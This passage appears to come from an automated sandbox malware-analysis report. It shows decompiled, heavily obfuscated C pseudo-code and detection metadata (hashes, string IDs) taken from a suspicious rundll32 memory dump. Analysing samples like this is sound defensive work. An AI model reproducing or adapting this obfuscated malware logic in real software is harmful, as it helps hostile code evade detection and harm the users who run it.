                                                                                                                      				_v1752 = _v1752 ^ 0x00023595;
                                                                                                                      				_v1728 = 0x3989b2;
                                                                                                                      				_v1728 = _v1728 * 0x27;
                                                                                                                      				_v1728 = _v1728 * 0x4d;
                                                                                                                      				_v1728 = _v1728 << 4;
                                                                                                                      				_v1728 = _v1728 ^ 0x2f238c3a;
                                                                                                                      				_v1744 = 0x50e625;
                                                                                                                      				_v1744 = _v1744 ^ 0x2e9ac150;
                                                                                                                      				_v1744 = _v1744 >> 2;
                                                                                                                      				_v1744 = _v1744 >> 5;
                                                                                                                      				_v1744 = _v1744 ^ 0x00596b64;
                                                                                                                      				_v1684 = 0x3fc833;
                                                                                                                      				_t557 = 0x76;
                                                                                                                      				_v1684 = _v1684 / _t557;
                                                                                                                      				_v1684 = _v1684 ^ 0xe050a76e;
                                                                                                                      				_v1684 = _v1684 ^ 0xe05ba95d;
                                                                                                                      				_v1576 = 0x904481;
                                                                                                                      				_v1576 = _v1576 | 0xbb34e4d7;
                                                                                                                      				_v1576 = _v1576 ^ 0xbbb7ee3e;
                                                                                                                      				_v1612 = 0xe49eb3;
                                                                                                                      				_v1612 = _v1612 + 0xfa7c;
                                                                                                                      				_v1612 = _v1612 ^ 0x00e777f0;
                                                                                                                      				_v1624 = 0x2dc9df;
                                                                                                                      				_v1624 = _v1624 ^ 0xfde67a02;
                                                                                                                      				_v1624 = _v1624 >> 4;
                                                                                                                      				_v1624 = _v1624 ^ 0x0fd7f95a;
                                                                                                                      				_v1688 = 0xb27c91;
                                                                                                                      				_v1688 = _v1688 + 0xcc48;
                                                                                                                      				_v1688 = _v1688 + 0xffff6aea;
                                                                                                                      				_v1688 = _v1688 ^ 0x00b739bb;
                                                                                                                      				_v1676 = 0x9962ec;
                                                                                                                      				_v1676 = _v1676 + 0xd2bc;
                                                                                                                      				_t627 = 0x59;
                                                                                                                      				_t558 = 0x22;
                                                                                                                      				_v1676 = _v1676 * 0x31;
                                                                                                                      				_v1676 = _v1676 ^ 0x1d838c0c;
                                                                                                                      				_v1720 = 0x20e7d3;
                                                                                                                      				_v1720 = _v1720 / _t627;
                                                                                                                      				_v1720 = _v1720 / _t558;
                                                                                                                      				_v1720 = _v1720 / _t627;
                                                                                                                      				_v1720 = _v1720 ^ 0x0002b2fc;
                                                                                                                      				_v1652 = 0xf809ca;
                                                                                                                      				_v1652 = _v1652 | 0xf7ee8eed;
                                                                                                                      				_v1652 = _v1652 << 1;
                                                                                                                      				_v1652 = _v1652 ^ 0xeff238d7;
                                                                                                                      				_v1580 = 0x7cb108;
                                                                                                                      				_v1580 = _v1580 + 0x41b4;
                                                                                                                      				_v1580 = _v1580 ^ 0x0076b4d3;
                                                                                                                      				_v1668 = 0xb3209d;
                                                                                                                      				_t559 = 0x53;
                                                                                                                      				_v1668 = _v1668 / _t559;
                                                                                                                      				_v1668 = _v1668 << 0xd;
                                                                                                                      				_v1668 = _v1668 ^ 0x450753ed;
                                                                                                                      				_v1604 = 0x53775b;
                                                                                                                      				_v1604 = _v1604 | 0x32a41867;
                                                                                                                      				_v1604 = _v1604 ^ 0x32fba052;
                                                                                                                      				_v1636 = 0xbc3265;
                                                                                                                      				_v1636 = _v1636 + 0xffff23eb;
                                                                                                                      				_v1636 = _v1636 ^ 0xe68a0726;
                                                                                                                      				_v1636 = _v1636 ^ 0xe63f3d4e;
                                                                                                                      				_v1756 = 0xe1916f;
                                                                                                                      				_v1756 = _v1756 + 0x6ec8;
                                                                                                                      				_v1756 = _v1756 | 0xf937d932;
                                                                                                                      				_v1756 = _v1756 + 0xfffffd3f;
                                                                                                                      				_v1756 = _v1756 ^ 0xf9f085ba;
                                                                                                                      				_v1588 = 0x69c4ca;
                                                                                                                      				_v1588 = _v1588 + 0xe8a1;
                                                                                                                      				_v1588 = _v1588 ^ 0x00630ca4;
                                                                                                                      				_v1584 = 0x6b201e;
                                                                                                                      				_v1584 = _v1584 | 0x74aee044;
                                                                                                                      				_v1584 = _v1584 ^ 0x74eba3bf;
                                                                                                                      				_v1760 = 0xf230ab;
                                                                                                                      				_v1760 = _v1760 >> 9;
                                                                                                                      				_v1760 = _v1760 >> 0xa;
                                                                                                                      				_v1760 = _v1760 >> 4;
                                                                                                                      				_v1760 = _v1760 ^ 0x00016a96;
                                                                                                                      				_v1704 = 0x98b305;
                                                                                                                      				_v1704 = _v1704 + 0x69fd;
                                                                                                                      				_v1704 = _v1704 ^ 0x979b8a6a;
                                                                                                                      				_v1704 = _v1704 + 0xffff998b;
                                                                                                                      				_v1704 = _v1704 ^ 0x9709d1d7;
                                                                                                                      				_v1736 = 0xce8702;
                                                                                                                      				_v1736 = _v1736 >> 0xa;
                                                                                                                      				_v1736 = _v1736 + 0x7a8b;
                                                                                                                      				_v1736 = _v1736 << 1;
                                                                                                                      				_v1736 = _v1736 ^ 0x000e6a30;
                                                                                                                      				_v1740 = 0x4c6a4b;
                                                                                                                      				_v1740 = _v1740 << 0xb;
                                                                                                                      				_v1740 = _v1740 | 0x0577b2ac;
                                                                                                                      				_v1740 = _v1740 + 0xffff4db5;
                                                                                                                      				_v1740 = _v1740 ^ 0x6775c844;
                                                                                                                      				_v1748 = 0x8b8c8;
                                                                                                                      				_t560 = 0x14;
                                                                                                                      				_v1748 = _v1748 / _t560;
                                                                                                                      				_t561 = 0x67;
                                                                                                                      				_v1748 = _v1748 / _t561;
                                                                                                                      				_t562 = 7;
                                                                                                                      				_v1748 = _v1748 * 0x36;
                                                                                                                      				_v1748 = _v1748 ^ 0x000fee79;
                                                                                                                      				_v1660 = 0xc3e5ac;
                                                                                                                      				_v1660 = _v1660 + 0xffffa1ff;
                                                                                                                      				_t563 = 0x46;
                                                                                                                      				_v1660 = _v1660 / _t562;
                                                                                                                      				_v1660 = _v1660 ^ 0x001e32d9;
                                                                                                                      				_v1664 = 0x1a636c;
                                                                                                                      				_v1664 = _v1664 | 0xf6dbfbcf;
                                                                                                                      				_v1664 = _v1664 ^ 0xf6df054d;
                                                                                                                      				_v1724 = 0xea18bc;
                                                                                                                      				_v1724 = _v1724 / _t563;
                                                                                                                      				_v1724 = _v1724 | 0x2d596700;
                                                                                                                      				_v1724 = _v1724 >> 1;
                                                                                                                      				_v1724 = _v1724 ^ 0x16a5f059;
                                                                                                                      				_v1672 = 0x567483;
                                                                                                                      				_v1672 = _v1672 >> 7;
                                                                                                                      				_v1672 = _v1672 + 0xffffe0a0;
                                                                                                                      				_v1672 = _v1672 ^ 0x000eacf4;
                                                                                                                      				_v1680 = 0x757070;
                                                                                                                      				_v1680 = _v1680 >> 0xd;
                                                                                                                      				_v1680 = _v1680 ^ 0xeacc73ee;
                                                                                                                      				_v1680 = _v1680 ^ 0xeac5b183;
                                                                                                                      				_v1648 = 0x45ab81;
                                                                                                                      				_v1648 = _v1648 >> 6;
                                                                                                                      				_v1648 = _v1648 + 0xffff50ab;
                                                                                                                      				_v1648 = _v1648 ^ 0x000d5f86;
                                                                                                                      				_v1708 = 0x462580;
                                                                                                                      				_t564 = 0xb;
                                                                                                                      				_t550 = _v1568;
                                                                                                                      				_v1708 = _v1708 / _t564;
                                                                                                                      				_t565 = 0x75;
                                                                                                                      				_v1708 = _v1708 / _t565;
                                                                                                                      				_t566 = 0x37;
                                                                                                                      				_v1708 = _v1708 * 0x50;
                                                                                                                      				_v1708 = _v1708 ^ 0x00078e43;
                                                                                                                      				_v1592 = 0x6b02b0;
                                                                                                                      				_v1592 = _v1592 + 0xffff70eb;
                                                                                                                      				_v1592 = _v1592 ^ 0x006caa59;
                                                                                                                      				_v1600 = 0x2f56d1;
                                                                                                                      				_v1600 = _v1600 ^ 0x1dd1a998;
                                                                                                                      				_v1600 = _v1600 ^ 0x1df0badb;
                                                                                                                      				_v1656 = 0xa683af;
                                                                                                                      				_v1656 = _v1656 / _t566;
                                                                                                                      				_v1656 = _v1656 << 1;
                                                                                                                      				_v1656 = _v1656 ^ 0x0003d06f;
                                                                                                                      				_v1608 = 0x6ef6d9;
                                                                                                                      				_v1608 = _v1608 + 0xd0f0;
                                                                                                                      				_v1608 = _v1608 ^ 0x006391fa;
                                                                                                                      				_v1700 = 0x90b08b;
                                                                                                                      				_v1700 = _v1700 + 0x4c46;
                                                                                                                      				_v1700 = _v1700 | 0x5cc03ba9;
                                                                                                                      				_t567 = 0x12;
                                                                                                                      				_v1700 = _v1700 / _t567;
                                                                                                                      				_v1700 = _v1700 ^ 0x052b7d82;
                                                                                                                      				_v1692 = 0x3d9f33;
                                                                                                                      				_v1692 = _v1692 + 0xffff6a07;
                                                                                                                      				_v1692 = _v1692 ^ 0xa1c8547f;
                                                                                                                      				_v1692 = _v1692 ^ 0xa1f3c56b;
                                                                                                                      				_v1632 = 0x96979b;
                                                                                                                      				_v1632 = _v1632 / _t627;
                                                                                                                      				_v1632 = _v1632 >> 0xa;
                                                                                                                      				_v1632 = _v1632 ^ 0x0009a5bf;
                                                                                                                      				_v1640 = 0x6f31a2;
                                                                                                                      				_v1640 = _v1640 ^ 0x3a2ad5a2;
                                                                                                                      				_v1640 = _v1640 ^ 0xeb2d3a23;
                                                                                                                      				_v1640 = _v1640 ^ 0xd16332d1;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t568 = 0x5c;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t526 = 0xdd30c3;
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							if(_t625 == _t526) {
                                                                                                                      								_t531 = E0082B6CE(_v1664, _v1648, _t550, _v1708, _v1592, _v1600, _v1716, _v1656, _v1564, _v1608,  &_v1560, 2 + E0082AE68(_v1664, _v1724, _v1672,  &_v1560, _v1680) * 2);
                                                                                                                      								_t631 =  &(_t631[0xd]);
                                                                                                                      								__eflags = _t531;
                                                                                                                      								_t625 = 0xd26443e;
                                                                                                                      								_t471 = _t531 == 0;
                                                                                                                      								__eflags = _t471;
                                                                                                                      								_v1568 = 0 | _t471;
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								if(_t625 == 0x971d92c) {
                                                                                                                      									_push(_t568);
                                                                                                                      									E0081DE7B( &_v520, _v1696, _v1616, _t568, _v1572, _v1732, _v1628);
                                                                                                                      									_t631 =  &(_t631[7]);
                                                                                                                      									_t625 = 0xf5a31c5;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									if(_t625 == 0x9b520f4) {
                                                                                                                      										_t552 =  *0x1002520c + 0x220;
                                                                                                                      										while(1) {
                                                                                                                      											__eflags =  *_t552 - _t568;
                                                                                                                      											if(__eflags == 0) {
                                                                                                                      												break;
                                                                                                                      											}
                                                                                                                      											_t552 = _t552 + 2;
                                                                                                                      											__eflags = _t552;
                                                                                                                      										}
                                                                                                                      										_t550 = _t552 + 2;
                                                                                                                      										_t625 = 0xaa323c9;
                                                                                                                      										goto L2;
                                                                                                                      									} else {
                                                                                                                      										if(_t625 == 0xaa323c9) {
                                                                                                                      											_push(_v1636);
                                                                                                                      											_push(_v1604);
                                                                                                                      											_t572 = _v1580;
                                                                                                                      											_push(0x1000118c);
                                                                                                                      											__eflags = E00817B86(_v1756, _v1668, _v1580,  &_v1564, _v1588, E00819F66(_v1580, _v1668, __eflags), _v1584, _v1760, _v1580, _t572, _v1704, _v1644, _v1596, _t572, _v1736);
                                                                                                                      											_t625 =  ==  ? 0xdd30c3 : 0x546d466;
                                                                                                                      											E0081A203(_v1740, _v1748, _v1660, _t534);
                                                                                                                      											_t631 =  &(_t631[0x12]);
                                                                                                                      											L17:
                                                                                                                      											_t526 = 0xdd30c3;
                                                                                                                      											_t568 = 0x5c;
                                                                                                                      											goto L18;
                                                                                                                      										} else {
                                                                                                                      											if(_t625 == 0xd26443e) {
                                                                                                                      												E00816EF8(_v1700, _v1692, _v1564, _v1632, _v1640);
                                                                                                                      											} else {
                                                                                                                      												_t640 = _t625 - 0xf5a31c5;
                                                                                                                      												if(_t625 != 0xf5a31c5) {
                                                                                                                      													goto L18;
                                                                                                                      												} else {
                                                                                                                      													_push(_v1728);
                                                                                                                      													_push(_v1752);
                                                                                                                      													_push(0x100010fc);
                                                                                                                      													_t540 = E00819F66(_v1712, _v1620, _t640);
                                                                                                                      													E0082BA6E( &_v1040, _t640);
                                                                                                                      													_t427 =  &_v1684; // 0xe63f3d4e
                                                                                                                      													E0082B1B5( &_v1560, _t640, _v1744,  *_t427, _v1576, _v1612,  *0x1002520c + 0x220, _v1624, _v1688,  *0x1002520c + 8,  &_v1040,  &_v520, _t540);
                                                                                                                      													E0081A203(_v1676, _v1720, _v1652, _t540);
                                                                                                                      													_t631 =  &(_t631[0x10]);
                                                                                                                      													_t625 = 0x9b520f4;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														_t568 = 0x5c;
                                                                                                                      														L2:
                                                                                                                      														_t526 = 0xdd30c3;
                                                                                                                      														goto L3;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L21:
                                                                                                                      							return _v1568;
                                                                                                                      							L18:
                                                                                                                      							__eflags = _t625 - 0x546d466;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x0082d286
                                                                                                                      0x0082d291
                                                                                                                      0x0082d299
                                                                                                                      0x0082d2a4
                                                                                                                      0x0082d2b1
                                                                                                                      0x0082d2bd
                                                                                                                      0x0082d2c2
                                                                                                                      0x0082d2c9
                                                                                                                      0x0082d2d8
                                                                                                                      0x0082d2dd
                                                                                                                      0x0082d2e8
                                                                                                                      0x0082d2eb
                                                                                                                      0x0082d2ef
                                                                                                                      0x0082d2f7
                                                                                                                      0x0082d302
                                                                                                                      0x0082d30d
                                                                                                                      0x0082d318
                                                                                                                      0x0082d323
                                                                                                                      0x0082d32e
                                                                                                                      0x0082d339
                                                                                                                      0x0082d349
                                                                                                                      0x0082d34d
                                                                                                                      0x0082d351
                                                                                                                      0x0082d359
                                                                                                                      0x0082d364
                                                                                                                      0x0082d36f
                                                                                                                      0x0082d37a
                                                                                                                      0x0082d382
                                                                                                                      0x0082d38a
                                                                                                                      0x0082d396
                                                                                                                      0x0082d39b
                                                                                                                      0x0082d39f
                                                                                                                      0x0082d3a7
                                                                                                                      0x0082d3af
                                                                                                                      0x0082d3b7
                                                                                                                      0x0082d3bf
                                                                                                                      0x0082d3c7
                                                                                                                      0x0082d3db
                                                                                                                      0x0082d3e2
                                                                                                                      0x0082d3ea
                                                                                                                      0x0082d3f5
                                                                                                                      0x0082d400
                                                                                                                      0x0082d40b
                                                                                                                      0x0082d416
                                                                                                                      0x0082d421
                                                                                                                      0x0082d421
                                                                                                                      0x0082d423
                                                                                                                      0x0082d424
                                                                                                                      0x0082d424
                                                                                                                      0x0082d424
                                                                                                                      0x0082d429
                                                                                                                      0x0082d429
                                                                                                                      0x0082d42b
                                                                                                                      0x0082d65d
                                                                                                                      0x0082d664
                                                                                                                      0x0082d667
                                                                                                                      0x0082d669
                                                                                                                      0x0082d66e
                                                                                                                      0x0082d66e
                                                                                                                      0x0082d671
                                                                                                                      0x00000000
                                                                                                                      0x0082d431
                                                                                                                      0x0082d437
                                                                                                                      0x0082d5c5
                                                                                                                      0x0082d5eb
                                                                                                                      0x0082d5f0
                                                                                                                      0x0082d5f3
                                                                                                                      0x00000000
                                                                                                                      0x0082d43d
                                                                                                                      0x0082d443
                                                                                                                      0x0082d5ab
                                                                                                                      0x0082d5b6
                                                                                                                      0x0082d5b6
                                                                                                                      0x0082d5b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082d5b3
                                                                                                                      0x0082d5b3
                                                                                                                      0x0082d5b3
                                                                                                                      0x0082d5bb
                                                                                                                      0x0082d5be
                                                                                                                      0x00000000
                                                                                                                      0x0082d449
                                                                                                                      0x0082d44b
                                                                                                                      0x0082d513
                                                                                                                      0x0082d51a
                                                                                                                      0x0082d525
                                                                                                                      0x0082d52c
                                                                                                                      0x0082d579
                                                                                                                      0x0082d595
                                                                                                                      0x0082d598
                                                                                                                      0x0082d59d
                                                                                                                      0x0082d678
                                                                                                                      0x0082d67a
                                                                                                                      0x0082d67f
                                                                                                                      0x00000000
                                                                                                                      0x0082d451
                                                                                                                      0x0082d457
                                                                                                                      0x0082d6ab
                                                                                                                      0x0082d45d
                                                                                                                      0x0082d45d
                                                                                                                      0x0082d463
                                                                                                                      0x00000000
                                                                                                                      0x0082d469
                                                                                                                      0x0082d469
                                                                                                                      0x0082d46d
                                                                                                                      0x0082d47c
                                                                                                                      0x0082d481
                                                                                                                      0x0082d48f
                                                                                                                      0x0082d4de
                                                                                                                      0x0082d4e9
                                                                                                                      0x0082d501
                                                                                                                      0x0082d506
                                                                                                                      0x0082d509
                                                                                                                      0x0082d421
                                                                                                                      0x0082d421
                                                                                                                      0x0082d423
                                                                                                                      0x0082d424
                                                                                                                      0x0082d424
                                                                                                                      0x00000000
                                                                                                                      0x0082d424
                                                                                                                      0x0082d421
                                                                                                                      0x0082d463
                                                                                                                      0x0082d457
                                                                                                                      0x0082d44b
                                                                                                                      0x0082d443
                                                                                                                      0x0082d437
                                                                                                                      0x0082d6b3
                                                                                                                      0x0082d6c4
                                                                                                                      0x0082d680
                                                                                                                      0x0082d680
                                                                                                                      0x0082d680
                                                                                                                      0x00000000
                                                                                                                      0x0082d68c
                                                                                                                      0x0082d424

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #:-$'$>D&$>D&$FL$JRP$KjL$N=?$YU$[wS$dkY$ppu
                                                                                                                      • API String ID: 0-3845620242
                                                                                                                      • Opcode ID: 171d9a83f24d20673f144a38ed254fce88a0b042ed2d3d1c87c9090dd588524e
                                                                                                                      • Instruction ID: 3b315807bb8265a75d1d92a10df89dbfae9e42a3d743461de3e6d7cd7235e282
                                                                                                                      • Opcode Fuzzy Hash: 171d9a83f24d20673f144a38ed254fce88a0b042ed2d3d1c87c9090dd588524e
                                                                                                                      • Instruction Fuzzy Hash: D8320272509380DFE368CF65D94AA8FBBE2FBC4318F10891DE19986260D7B59949CF07
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0082E294(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v4;
                                                                                                                      				char _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				intOrPtr _v100;
                                                                                                                      				intOrPtr _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				intOrPtr _t445;
                                                                                                                      				void* _t448;
                                                                                                                      				intOrPtr _t453;
                                                                                                                      				signed int _t467;
                                                                                                                      				intOrPtr _t470;
                                                                                                                      				intOrPtr _t471;
                                                                                                                      				void* _t505;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				signed int _t514;
                                                                                                                      				signed int _t515;
                                                                                                                      				signed int _t516;
                                                                                                                      				signed int _t517;
                                                                                                                      				signed int _t518;
                                                                                                                      				signed int _t519;
                                                                                                                      				signed int _t520;
                                                                                                                      				intOrPtr* _t521;
                                                                                                                      				signed int _t524;
                                                                                                                      				intOrPtr _t529;
                                                                                                                      				signed int* _t531;
                                                                                                                      				void* _t533;
                                                                                                                      
                                                                                                                      				_t471 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_v104 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_v12 = __edx;
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0081C325(__edx);
                                                                                                                      				_v124 = 0x410507;
                                                                                                                      				_t531 =  &(( &_v192)[4]);
                                                                                                                      				_v124 = _v124 ^ 0x83a2264d;
                                                                                                                      				_v124 = _v124 >> 0xa;
                                                                                                                      				_t470 = 0;
                                                                                                                      				_t529 = 0;
                                                                                                                      				_t512 = 0x17;
                                                                                                                      				_t524 = 0xd582a45;
                                                                                                                      				_v124 = _v124 * 3;
                                                                                                                      				_v124 = _v124 ^ 0x0062ea59;
                                                                                                                      				_v164 = 0x8ee5f4;
                                                                                                                      				_v164 = _v164 << 0xd;
                                                                                                                      				_v164 = _v164 ^ 0xc2bd4067;
                                                                                                                      				_v164 = _v164 + 0xffffa455;
                                                                                                                      				_v164 = _v164 ^ 0x1e0364bd;
                                                                                                                      				_v116 = 0xd0c3db;
                                                                                                                      				_v116 = _v116 + 0x7244;
                                                                                                                      				_v116 = _v116 + 0xffff5950;
                                                                                                                      				_v116 = _v116 * 0x7d;
                                                                                                                      				_v116 = _v116 ^ 0x65d60932;
                                                                                                                      				_v76 = 0x69c3d0;
                                                                                                                      				_v76 = _v76 + 0x2803;
                                                                                                                      				_v76 = _v76 ^ 0x0109b4af;
                                                                                                                      				_v76 = _v76 ^ 0x016cb6ed;
                                                                                                                      				_v84 = 0x591f9b;
                                                                                                                      				_v84 = _v84 ^ 0x136c22a2;
                                                                                                                      				_v84 = _v84 + 0xbc03;
                                                                                                                      				_v84 = _v84 ^ 0x133eabdb;
                                                                                                                      				_v40 = 0x32843;
                                                                                                                      				_v40 = _v40 + 0x6836;
                                                                                                                      				_v40 = _v40 ^ 0x000a5f7a;
                                                                                                                      				_v96 = 0x3c9c05;
                                                                                                                      				_v96 = _v96 * 0x1a;
                                                                                                                      				_v96 = _v96 ^ 0xb1c6e809;
                                                                                                                      				_v96 = _v96 ^ 0xb7e34fe8;
                                                                                                                      				_v56 = 0xda9312;
                                                                                                                      				_v56 = _v56 / _t512;
                                                                                                                      				_v56 = _v56 ^ 0x0000b271;
                                                                                                                      				_v132 = 0xda0ea8;
                                                                                                                      				_v132 = _v132 | 0xaeef9bf7;
                                                                                                                      				_t513 = 0x71;
                                                                                                                      				_v132 = _v132 / _t513;
                                                                                                                      				_v132 = _v132 ^ 0x01890540;
                                                                                                                      				_v44 = 0x61f218;
                                                                                                                      				_v44 = _v44 + 0xffff41d7;
                                                                                                                      				_v44 = _v44 ^ 0x006fe265;
                                                                                                                      				_v144 = 0x306d33;
                                                                                                                      				_v144 = _v144 + 0xfffff564;
                                                                                                                      				_v144 = _v144 * 0x6e;
                                                                                                                      				_v144 = _v144 + 0xffff469c;
                                                                                                                      				_v144 = _v144 ^ 0x14c9b51d;
                                                                                                                      				_v52 = 0x70de34;
                                                                                                                      				_v52 = _v52 << 3;
                                                                                                                      				_v52 = _v52 ^ 0x038f9e4d;
                                                                                                                      				_v36 = 0x6cb1ac;
                                                                                                                      				_v36 = _v36 + 0x1a54;
                                                                                                                      				_v36 = _v36 ^ 0x00646b3f;
                                                                                                                      				_v152 = 0x976d54;
                                                                                                                      				_v152 = _v152 ^ 0x53b4556c;
                                                                                                                      				_v152 = _v152 ^ 0x5116bac9;
                                                                                                                      				_v152 = _v152 ^ 0x4d195c93;
                                                                                                                      				_v152 = _v152 ^ 0x4f27d4c2;
                                                                                                                      				_v28 = 0x414a88;
                                                                                                                      				_v28 = _v28 | 0x717fc69d;
                                                                                                                      				_v28 = _v28 ^ 0x71799fc5;
                                                                                                                      				_v160 = 0xc7706;
                                                                                                                      				_v160 = _v160 + 0xc91f;
                                                                                                                      				_v160 = _v160 | 0xaa894ceb;
                                                                                                                      				_v160 = _v160 + 0xffffb57b;
                                                                                                                      				_v160 = _v160 ^ 0xaa88db85;
                                                                                                                      				_v168 = 0x67f23c;
                                                                                                                      				_v168 = _v168 ^ 0x8eced2dd;
                                                                                                                      				_v168 = _v168 ^ 0x27c733d3;
                                                                                                                      				_v168 = _v168 ^ 0x736125b9;
                                                                                                                      				_v168 = _v168 ^ 0xda0ef7f2;
                                                                                                                      				_v176 = 0x85bb3;
                                                                                                                      				_v176 = _v176 | 0x89ba1603;
                                                                                                                      				_v176 = _v176 >> 8;
                                                                                                                      				_t514 = 0x6a;
                                                                                                                      				_v176 = _v176 / _t514;
                                                                                                                      				_v176 = _v176 ^ 0x0009ce33;
                                                                                                                      				_v136 = 0xb0a921;
                                                                                                                      				_v136 = _v136 ^ 0x2367151f;
                                                                                                                      				_v136 = _v136 ^ 0x64865221;
                                                                                                                      				_t515 = 0x35;
                                                                                                                      				_v136 = _v136 * 0x3f;
                                                                                                                      				_v136 = _v136 ^ 0x8d2b953d;
                                                                                                                      				_v148 = 0x2df722;
                                                                                                                      				_v148 = _v148 * 0x30;
                                                                                                                      				_v148 = _v148 + 0xd30d;
                                                                                                                      				_v148 = _v148 | 0x68c8f2ae;
                                                                                                                      				_v148 = _v148 ^ 0x68db5c3d;
                                                                                                                      				_v92 = 0xa4f97a;
                                                                                                                      				_v92 = _v92 ^ 0x325a0e28;
                                                                                                                      				_v92 = _v92 + 0x57de;
                                                                                                                      				_v92 = _v92 ^ 0x32f51d21;
                                                                                                                      				_v32 = 0xa83f00;
                                                                                                                      				_v32 = _v32 + 0xffff47e2;
                                                                                                                      				_v32 = _v32 ^ 0x00a2bde7;
                                                                                                                      				_v156 = 0xe5ea35;
                                                                                                                      				_t178 =  &_v156; // 0xe5ea35
                                                                                                                      				_v156 =  *_t178 / _t515;
                                                                                                                      				_v156 = _v156 << 5;
                                                                                                                      				_v156 = _v156 + 0x3621;
                                                                                                                      				_v156 = _v156 ^ 0x008c998d;
                                                                                                                      				_v180 = 0x37bb8c;
                                                                                                                      				_v180 = _v180 ^ 0x8c6790c9;
                                                                                                                      				_t516 = 0x3c;
                                                                                                                      				_v180 = _v180 * 0x44;
                                                                                                                      				_v180 = _v180 | 0x3ef8ecb7;
                                                                                                                      				_v180 = _v180 ^ 0x7ff3e314;
                                                                                                                      				_v88 = 0x10d686;
                                                                                                                      				_v88 = _v88 + 0xffff44b6;
                                                                                                                      				_v88 = _v88 / _t516;
                                                                                                                      				_v88 = _v88 ^ 0x000573bd;
                                                                                                                      				_v64 = 0x2cf4a8;
                                                                                                                      				_v64 = _v64 << 0xb;
                                                                                                                      				_v64 = _v64 + 0xffff4c9b;
                                                                                                                      				_v64 = _v64 ^ 0x67a6f27b;
                                                                                                                      				_v188 = 0x434d7c;
                                                                                                                      				_t218 =  &_v188; // 0x434d7c
                                                                                                                      				_v188 =  *_t218 * 0x14;
                                                                                                                      				_v188 = _v188 + 0xffff53dc;
                                                                                                                      				_v188 = _v188 * 0x58;
                                                                                                                      				_v188 = _v188 ^ 0xce78d82e;
                                                                                                                      				_v48 = 0x39a498;
                                                                                                                      				_v48 = _v48 + 0xd90b;
                                                                                                                      				_v48 = _v48 ^ 0x00328937;
                                                                                                                      				_v172 = 0x329194;
                                                                                                                      				_v172 = _v172 + 0x15c2;
                                                                                                                      				_v172 = _v172 ^ 0x8846dc1f;
                                                                                                                      				_v172 = _v172 + 0x561;
                                                                                                                      				_v172 = _v172 ^ 0x8878b13b;
                                                                                                                      				_v140 = 0x921bc4;
                                                                                                                      				_v140 = _v140 | 0xc689e64a;
                                                                                                                      				_v140 = _v140 >> 0xc;
                                                                                                                      				_v140 = _v140 ^ 0x67a6be9d;
                                                                                                                      				_v140 = _v140 ^ 0x67a0761b;
                                                                                                                      				_v72 = 0xa3a418;
                                                                                                                      				_t517 = 0x26;
                                                                                                                      				_v72 = _v72 * 0x26;
                                                                                                                      				_v72 = _v72 >> 0x10;
                                                                                                                      				_v72 = _v72 ^ 0x0002c06b;
                                                                                                                      				_v108 = 0xd1ae1a;
                                                                                                                      				_v108 = _v108 ^ 0x567f87f9;
                                                                                                                      				_v108 = _v108 | 0x0eb5e220;
                                                                                                                      				_v108 = _v108 ^ 0x558f672f;
                                                                                                                      				_v108 = _v108 ^ 0x0b3c3f9a;
                                                                                                                      				_v80 = 0x5d29a8;
                                                                                                                      				_v80 = _v80 | 0x5a2f4123;
                                                                                                                      				_v80 = _v80 / _t517;
                                                                                                                      				_v80 = _v80 ^ 0x0265326d;
                                                                                                                      				_v184 = 0x50dc21;
